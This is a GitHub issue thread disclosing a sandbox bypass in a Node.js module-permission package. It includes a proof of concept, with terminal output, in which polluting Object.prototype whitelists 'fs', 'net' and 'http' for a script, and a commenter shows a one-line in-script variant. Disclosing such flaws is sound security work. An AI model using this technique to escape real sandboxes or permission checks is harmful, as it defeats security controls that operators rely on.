Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Security check bypass through the pollution of the prototype of object #10

Open
HoLyVieR opened this issue Dec 31, 2018 · 1 comment
Open

Security check bypass through the pollution of the prototype of object #10

HoLyVieR opened this issue Dec 31, 2018 · 1 comment

Comments

@HoLyVieR
Copy link

I would like to second the concern of Qix in regards to the approach of sandboxing without creating a new JavaScript context. One of the issue that arises when sharing context is that the native object (ex.: Object, Number, String, etc.) will be shared and a lot of properties of those object are mutable. Those mutation can affect the execution of the script that checks things and the execution of whitelisted module.

Here's a very simple POC demonstrating the issue (I'm using the same script as Qix except for the bypass). The bypass works by polluting the prototype of Object so that an extra property now exists in the configuration saying that "demo.js" is allowed to used "fs", "net" and "http".

/* secure.js */

const nodesecurity = require( '@matthaywardwebdesign/node-security' );
const NodeSecurity = new nodesecurity();

// Don't allow anything at all.
NodeSecurity.configure({});

/* demo.js */

function try_require(name) {
	try {
		require(name);
		console.log(name, '\x1b[1;32mOK\x1b[m');
	} catch (e) {
		console.error(name, '\x1b[1;31mFAIL\x1b[m -', e.message);
	}
}

try_require('http');
try_require('fs');
try_require('net');

/* bypass.js */

Object.prototype[__filename.replace("bypass.js", "demo.js")] = { http: true, fs:true, net:true };

$ node demo.js 
Executing ...
http OK
fs OK
net OK

$ node -r ./secure.js demo.js 
Executing ...
http FAIL - NodeSecurity has blocked an attempt to access module 'http'. Parent modules = ['/.../demo.js']
fs FAIL - NodeSecurity has blocked an attempt to access module 'fs'. Parent modules = ['/.../demo.js']
net FAIL - NodeSecurity has blocked an attempt to access module 'net'. Parent modules = ['/.../demo.js']

$ node -r ./secure.js -r ./bypass.js ./demo.js 
Executing ...
http OK
fs OK
net OK
@mrodrig
Copy link

mrodrig commented Jan 1, 2019
edited
Loading

You can also bypass it directly within demo.js in the above example by adding the following before the try_require() calls:

Object.prototype[__filename] = { http: true, fs:true, net:true };

So demo.js would be:

/* demo.js */

function try_require(name) {
	try {
		require(name);
		console.log(name, '\x1b[1;32mOK\x1b[m');
	} catch (e) {
		console.error(name, '\x1b[1;31mFAIL\x1b[m -', e.message);
	}
}

Object.prototype[__filename] = { http: true, fs:true, net:true };

try_require('http');
try_require('fs');
try_require('net');

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@HoLyVieR @mrodrig